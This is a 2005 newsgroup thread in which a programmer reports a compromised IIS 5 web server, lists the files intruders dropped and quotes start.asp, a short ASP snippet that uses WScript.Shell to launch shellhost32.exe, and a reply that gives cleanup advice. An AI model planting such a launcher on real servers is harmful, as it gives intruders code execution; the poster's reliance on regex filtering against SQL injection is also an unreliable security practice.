Re: IIS 5 Compromisation

From: Saturday Night Paulsy (pkorosi_at_redpepper.com.au)
Date: 04/07/05

  • Next message: Ken Schaefer: "Re: Anonymous access" 
    Date: Thu, 7 Apr 2005 11:36:15 +1000

    ha ha - nice one Jeff,

    I might be dumb but I aint that stupit. I admit I am no security
    specialist - I'm a programmer. I thought someone here
    might be able to shed some light, judging by the responses to the questions
    in this group, some of which quite frankly
    don't even belong in this group.

    As for your suggestions, administrator only ftp access, 13 character strong
    password - it would even take YOU a
    century to work it out. All database submissions/request are filtered
    against SQL injection attacks using regex. I simply
    can't see any way in via that side.

    Anyways - it turns out its the Win32.IRCFlood trojan, and appears to be
    fairly new as the only patch available to deal with it
    is dated yesterday. And, as my MSCE friend has just told me (after some
    research), firewalls won't necessarily stop it from getting on
    the box - only stop the gigs of *** from getting put on.

    For anyone that might be interested, it was probably downloaded by someone
    doing "legit" work on the box by browsing. thats what
    the msce told me, anyways - and he's a good deal brighter than your average
    minesweeper certified solitaire expert.

    Finally, thanks for your help. Next time I reckon I'll just fart 'cause
    it'll save all this typing time. I could've been drinking coffee instead.

    "Jeff Cochran" <jeff.nospam@zina.com> wrote in message
    news:42616af5.1154390806@msnews.microsoft.com...
    > On Wed, 6 Apr 2005 20:45:35 +1000, "Saturday Night Paulsy"
    > <pkorosi@redpepper.com.au> wrote:
    >
    > >Hi all,
    > >
    > >my company has several servers acting as web servers hosted at an ISP and
    > >one of them was compromised by some warez bunnies.
    > >All the server have the latest patches and anti virus software running,
    but
    > >no firewall...
    > >
    > >Several files appeared in a folder off one of the webs, being
    > >
    > >kill.exe
    > >shellconfig.ocx
    > >shellsuccesslog.ocx
    > >win.asp
    > >start.asp
    > >shellhost32.exe
    > >
    > >
    > >win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and
    > >start.asp reads as follows
    > >
    > ><%
    > >CreateObject("WScript.Shell").Run("shellhost32.exe")
    > >%>
    > ><h1>Yes, you made it!! Good job dude!<\h1>
    > >
    > >
    > >My question is, has anyone encountered this and how do they get the files
    > >there. Two questions, really.
    >
    > To find out how they got there, check your audit logs and firewall
    > logs. Oh yeah, you already figured out that they got there because
    > you weren't secured and had no firewall. Likely you weren't auditing
    > either. Possibly hadn't turned off anonymous file upload in FTP.
    > Possibly your host got hacked. Possibly a SQL attack. Possibly using
    > "password" as a password wasn't that smart. Too many possiblys for
    > anyone to tell you for sure.
    >
    > >Any help would be greatly appreciated, as they uploaded a significant
    amount
    > >of german dvd's and other garbage onto the server at our expense.
    >
    > Bummer. Flatten the box, resinstall from scratch, patch, secure and
    > get that firewall installed. Live and learn.
    >
    > Jeff

  • Next message: Ken Schaefer: "Re: Anonymous access"